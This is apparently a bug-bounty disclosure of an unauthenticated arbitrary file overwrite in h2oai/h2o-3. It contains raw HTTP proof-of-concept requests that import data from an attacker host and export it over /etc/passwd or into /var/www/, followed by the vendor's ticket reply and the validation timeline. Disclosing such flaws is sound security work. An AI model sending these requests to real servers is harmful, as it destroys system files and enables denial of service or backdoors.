Remote Arbitrary System File Overwrite in h2oai/h2o-3

Valid

Reported on

Jun 9th 2023


Description

Remote unauthenticated attackers can overwrite arbitrary server files with attacker-controllable data.

Proof of Concept

Import arbitrary data using ImportFiles:

GET /3/ImportFiles?path=http://attacker.com/somefile HTTP/1.1
Host: 127.0.0.1:54321
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://127.0.0.1:54321/flow/index.html
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

Overwrite any arbitrary file that the user who ran h2o.init() has access to:

POST /3/Frames/someattackerimportedframename/export?path=/etc/passwd&force=true HTTP/1.1
Host: 127.0.0.1:54321
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://127.0.0.1:54321/flow/index.html
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Content-Length: 0

The data that the attacker can control is not entirely arbitrary. h2o writes a CSV/XLS/etc file to disk, so the attacker data is wrapped in quotations and starts with "C1", if they're exporting as CSV.

Developers were contacted 06/09/2023:

H2O Support
    
5:02 PM (21 minutes ago)
    
to me

Dear Dan McInerney,

We would like to acknowledge that we have received your request for support and a ticket has been created. A support representative will be reviewing your request and will send you a personal response.
Your ticket id is :  [#105583] 


To view the status of the ticket or add comments, please visit
https://support.h2o.ai/helpdesk/tickets/105583

Your problem description is as below:

The "Export" functionality of Frames has no restrictions on location and can overwrite local server files completely. This can lead to a remote server denial of service by overwriting system files or planting backdoors on the server. The attacker doesn't have complete control over the output as it is forced to be written in formats like CSV/XLS/etc but some configuration files and services may still be able to parse the h2o CSV format and be arbitrarily exploited. Example of attempting to write malformed malicious HTML to the html root can be seen below.

POST /3/Frames/nfs%3A%2F%2Fmalicioushtml/export HTTP/1.1
Host: 127.0.0.1:54321
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 28
Origin: http://127.0.0.1:54321
Connection: close
Referer: http://127.0.0.1:54321/flow/index.html
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

path=/var/www/&force=true


Thank you for your patience.

Sincerely,
H2O.ai Support Team

Impact

Overwriting arbitrary system files causing DoS or exploiting services that consume one of the file formats that h2o allows one to export as such as CSV, XLS.

We are processing your report and will contact the h2oai/h2o-3 team within 24 hours. 8 months ago
We have contacted a member of the h2oai/h2o-3 team and are waiting to hear back 8 months ago
Dan McInerney modified the Severity from Critical (10) to Critical (9.3) 4 months ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Marcello validated this vulnerability 4 months ago
danmcinerney has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
This vulnerability has now been published 2 months ago
to join this conversation